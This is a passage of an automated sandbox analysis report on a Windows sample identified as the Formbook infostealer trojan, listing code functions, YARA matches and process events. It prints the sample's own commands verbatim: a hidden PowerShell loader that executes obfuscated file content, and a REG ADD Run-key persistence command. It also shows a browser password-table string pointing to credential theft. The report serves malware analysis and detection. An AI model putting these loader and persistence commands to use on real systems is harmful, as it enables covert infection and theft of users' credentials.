Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204EEFA0 8_2_204EEFA0
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204770C0 8_2_204770C0
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2051F0CC 8_2_2051F0CC
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2052F0E0 8_2_2052F0E0
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_205270E9 8_2_205270E9
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_204A516C 8_2_204A516C
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2045F172 8_2_2045F172
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: 8_2_2053B16B 8_2_2053B16B
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_0322A352 14_2_0322A352
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_032303E6 14_2_032303E6
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_0317E3F0 14_2_0317E3F0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_03210274 14_2_03210274
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_031F02C0 14_2_031F02C0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_03160100 14_2_03160100
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_0320A118 14_2_0320A118
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_031F8158 14_2_031F8158
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_032241A2 14_2_032241A2
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_032301AA 14_2_032301AA
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_032281CC 14_2_032281CC
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_03202000 14_2_03202000
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_03194750 14_2_03194750
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_03170770 14_2_03170770
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_0316C7C0 14_2_0316C7C0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_0318C6E0 14_2_0318C6E0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_03170535 14_2_03170535
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_03230591 14_2_03230591
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_03214420 14_2_03214420
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_03222446 14_2_03222446
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_0321E4F6 14_2_0321E4F6
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_0322AB40 14_2_0322AB40
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_03226BD7 14_2_03226BD7
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_0316EA80 14_2_0316EA80
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_03186962 14_2_03186962
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_0323A9A6 14_2_0323A9A6
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_031729A0 14_2_031729A0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_0317A840 14_2_0317A840
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_03172840 14_2_03172840
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_031568B8 14_2_031568B8
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_0319E8F0 14_2_0319E8F0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_03212F30 14_2_03212F30
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_03190F30 14_2_03190F30
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_031B2F28 14_2_031B2F28
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_031E4F40 14_2_031E4F40
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_031EEFA0 14_2_031EEFA0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_03162FC8 14_2_03162FC8
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_0317CFE0 14_2_0317CFE0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_0322EE26 14_2_0322EE26
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_03170E59 14_2_03170E59
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_03182E90 14_2_03182E90
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_0322CE93 14_2_0322CE93
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_0322EEDB 14_2_0322EEDB
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_0317AD00 14_2_0317AD00
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_0320CD1F 14_2_0320CD1F
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_03188DBF 14_2_03188DBF
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_0316ADE0 14_2_0316ADE0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_03170C00 14_2_03170C00
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_03210CB5 14_2_03210CB5
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_03160CF2 14_2_03160CF2
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_0322132D 14_2_0322132D
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_0315D34C 14_2_0315D34C
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_031B739A 14_2_031B739A
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_031752A0 14_2_031752A0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_032112ED 14_2_032112ED
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_0318B2C0 14_2_0318B2C0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_0323B16B 14_2_0323B16B
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_0315F172 14_2_0315F172
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_031A516C 14_2_031A516C
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_0317B1B0 14_2_0317B1B0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_0322F0E0 14_2_0322F0E0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_032270E9 14_2_032270E9
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_031770C0 14_2_031770C0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_0321F0CC 14_2_0321F0CC
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_0322F7B0 14_2_0322F7B0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_031617EC 14_2_031617EC
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_032216CC 14_2_032216CC
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_03227571 14_2_03227571
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_0320D5B0 14_2_0320D5B0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_0322F43F 14_2_0322F43F
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_03161460 14_2_03161460
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_0322FB76 14_2_0322FB76
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_0318FB80 14_2_0318FB80
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_031ADBF9 14_2_031ADBF9
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_031E5BF0 14_2_031E5BF0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_03227A46 14_2_03227A46
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_0322FA49 14_2_0322FA49
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_031E3A6C 14_2_031E3A6C
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_03211AA3 14_2_03211AA3
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_0320DAAC 14_2_0320DAAC
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_031B5AA0 14_2_031B5AA0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_0321DAC6 14_2_0321DAC6
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_03205910 14_2_03205910
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_03179950 14_2_03179950
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_0318B950 14_2_0318B950
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_031DD800 14_2_031DD800
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_031738E0 14_2_031738E0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_0322FF09 14_2_0322FF09
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_03171F92 14_2_03171F92
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_0322FFB1 14_2_0322FFB1
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_03179EB0 14_2_03179EB0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_03227D73 14_2_03227D73
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_03173D40 14_2_03173D40
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_03221D5A 14_2_03221D5A
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_0318FDC0 14_2_0318FDC0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_031E9C32 14_2_031E9C32
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_0322FCF2 14_2_0322FCF2
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_003D1370 14_2_003D1370
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_003CC510 14_2_003CC510
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_003CC730 14_2_003CC730
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_003CA7B0 14_2_003CA7B0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_003D2EB0 14_2_003D2EB0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_003D2EAC 14_2_003D2EAC
Source: C:\Windows\SysWOW64\cmd.exe Code function: 14_2_003E9E80 14_2_003E9E80
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\nscAD7.tmp\nsExec.dll 10675F13ABAEE592F14382349AA35D82FB52AAB4E27EEF61D0C83DEC1F6B73DA
Found potential string decryption / allocating functions
Source: C:\Windows\SysWOW64\cmd.exe Code function: String function: 031EF290 appears 105 times
Source: C:\Windows\SysWOW64\cmd.exe Code function: String function: 0315B970 appears 283 times
Source: C:\Windows\SysWOW64\cmd.exe Code function: String function: 031A5130 appears 58 times
Source: C:\Windows\SysWOW64\cmd.exe Code function: String function: 031DEA12 appears 86 times
Source: C:\Windows\SysWOW64\cmd.exe Code function: String function: 031B7E54 appears 100 times
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: String function: 204B7E54 appears 54 times
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: String function: 204A5130 appears 32 times
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: String function: 204DEA12 appears 49 times
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: String function: 204EF290 appears 80 times
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Code function: String function: 2045B970 appears 111 times
Sample file is different than original file name gathered from version info
Source: SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe, 00000000.00000002.1378869869.000000000043E000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameblegrde.exeDVarFileInfo$ vs SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe
Source: SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe Binary or memory string: OriginalFilenameblegrde.exeDVarFileInfo$ vs SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe
Uses 32bit PE files
Source: SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Uses reg.exe to modify the Windows registry
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Hakkebrttet" /t REG_EXPAND_SZ /d "%elaf% -windowstyle minimized $Ultramicrotome=(Get-ItemProperty -Path 'HKCU:\noncoherent\').Skvadredes;%elaf% ($Ultramicrotome)"
Yara signature match
Source: 0000000E.00000002.2615858541.0000000000BD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000F.00000002.2616564781.0000000002D60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000E.00000002.2616210214.0000000000D20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000008.00000002.2164570528.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000E.00000002.2614202921.00000000003C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000008.00000002.2184865476.0000000021B80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000D.00000002.2615828558.0000000003550000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@17/13@4/4
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe Code function: 0_2_004033B3 EntryPoint,SetErrorMode,GetVersionExA,GetVersionExA,GetVersionExA,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 0_2_004033B3
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe Code function: 0_2_00404766 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA, 0_2_00404766
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe Code function: 0_2_00402173 CoCreateInstance,MultiByteToWideChar, 0_2_00402173
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7664:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7488:120:WilError_03
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe File created: C:\Users\user\AppData\Local\Temp\nsnA2B.tmp Jump to behavior
Source: SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: cmd.exe, 0000000E.00000002.2614682827.0000000000962000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.2614682827.0000000000958000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000003.2350094315.0000000000958000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000003.2349933593.0000000000937000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.2614682827.0000000000985000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe ReversingLabs: Detection: 50%
Source: SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe Virustotal: Detection: 57%
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe File read: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Indeterminative=Get-Content 'C:\Users\user\AppData\Local\Temp\Moviedom230\Enforcedly251\Afvrgningernes.Ign37';$Introducerer=$Indeterminative.SubString(18884,3);.$Introducerer($Indeterminative)"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "set /A 1^^0"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Local\Temp\Overfondle.exe "C:\Users\user\AppData\Local\Temp\Overfondle.exe"
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Hakkebrttet" /t REG_EXPAND_SZ /d "%elaf% -windowstyle minimized $Ultramicrotome=(Get-ItemProperty -Path 'HKCU:\noncoherent\').Skvadredes;%elaf% ($Ultramicrotome)"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Hakkebrttet" /t REG_EXPAND_SZ /d "%elaf% -windowstyle minimized $Ultramicrotome=(Get-ItemProperty -Path 'HKCU:\noncoherent\').Skvadredes;%elaf% ($Ultramicrotome)"
Source: C:\Program Files (x86)\hjbOBbqHClkGLKNPvXXxpOVoDBLJZtDcdsObrIHXwdfhzNckcWntHExpAxpjApDMgYSbQQmIoQHmYI\rmGjiHyfWQcajCGtrYkAoHJJOdK.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\SysWOW64\cmd.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Indeterminative=Get-Content 'C:\Users\user\AppData\Local\Temp\Moviedom230\Enforcedly251\Afvrgningernes.Ign37';$Introducerer=$Indeterminative.SubString(18884,3);.$Introducerer($Indeterminative)" Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "set /A 1^^0" Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Local\Temp\Overfondle.exe "C:\Users\user\AppData\Local\Temp\Overfondle.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Overfondle.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Hakkebrttet" /t REG_EXPAND_SZ /d "%elaf% -windowstyle minimized $Ultramicrotome=(Get-ItemProperty -Path 'HKCU:\noncoherent\').Skvadredes;%elaf% ($Ultramicrotome)" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Hakkebrttet" /t REG_EXPAND_SZ /d "%elaf% -windowstyle minimized $Ultramicrotome=(Get-ItemProperty -Path 'HKCU:\noncoherent\').Skvadredes;%elaf% ($Ultramicrotome)" Jump to behavior
Source: C:\Program Files (x86)\hjbOBbqHClkGLKNPvXXxpOVoDBLJZtDcdsObrIHXwdfhzNckcWntHExpAxpjApDMgYSbQQmIoQHmYI\rmGjiHyfWQcajCGtrYkAoHJJOdK.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\SysWOW64\cmd.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe" Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe Section loaded: dwmapi.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe Section loaded: oleacc.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe Section loaded: shfolder.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe Section loaded: riched20.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe Section loaded: usp10.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe Section loaded: msls31.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
